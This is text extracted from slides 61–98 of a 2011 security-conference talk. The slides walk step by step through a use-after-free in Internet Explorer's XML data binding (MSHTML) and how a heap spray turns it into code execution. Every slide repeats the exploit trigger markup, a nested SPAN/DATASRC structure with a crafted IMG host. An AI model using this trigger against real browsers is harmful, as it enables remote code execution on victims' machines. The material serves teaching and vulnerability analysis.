![Page 61: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/61.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CXfer::CreateBinding
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 62: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/62.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CElement::GetAAdataFld
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 63: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/63.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CElement::GetAAdataSrc
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 64: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/64.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CRecordInstance::AddBinding
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 65: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/65.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CImplPtrAry::Append
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 66: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/66.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD XML Data Source Object #01
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 67: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/67.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
![Page 68: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/68.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CElement::GetAAdataFld
![Page 69: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/69.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CElement::GetAAdataSrc
![Page 70: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/70.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CRecordInstance::CRecordInstance
![Page 71: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/71.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CCurrentRecordConsumer::Bind
![Page 72: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/72.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CCurrentRecordInstance::GetCurrentRecordInstance
![Page 73: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/73.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CXfer::CreateBinding
![Page 74: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/74.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CElement::GetAAdataFld
![Page 75: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/75.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CElement::GetAAdataSrc
![Page 76: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/76.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CRecordInstance::AddBinding
![Page 77: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/77.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
CImplPtrAry::Append
![Page 78: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/78.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
XML Data Source Object #01
XML Data Source Object #02
![Page 79: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/79.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CRecordInstance::TransferToDestination
XML Data Source Object #02
![Page 80: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/80.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
XML Data Source Object #02
![Page 81: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/81.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CXfer::TransferFromSrc
XML Data Source Object #02
![Page 82: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/82.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
XML Data Source Object #02
![Page 83: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/83.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CRecordInstance: :RemoveBinding
XML Data Source Object #02
![Page 84: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/84.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
_MemFree
XML Data Source Object #02
![Page 85: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/85.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
HeapFree
XML Data Source Object #02
![Page 86: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/86.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
Rt lFreeHeap
XML Data Source Object #02
![Page 87: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/87.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
Rt lpLowFragHeapFree
XML Data Source Object #02
![Page 88: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/88.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CImplAry : :De lete
XML Data Source Object #02
![Page 89: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/89.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CRecordInstance: :Detach
XML Data Source Object #02
![Page 90: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/90.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
XML Data Source Object #02
![Page 91: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/91.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
CXfer::TransferFromSrc
XML Data Source Object #02
![Page 92: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/92.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
![Page 93: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/93.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
![Page 94: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/94.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
![Page 95: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/95.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
eax
![Page 96: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/96.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
eax
![Page 97: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/97.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
eax
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
![Page 98: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/98.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
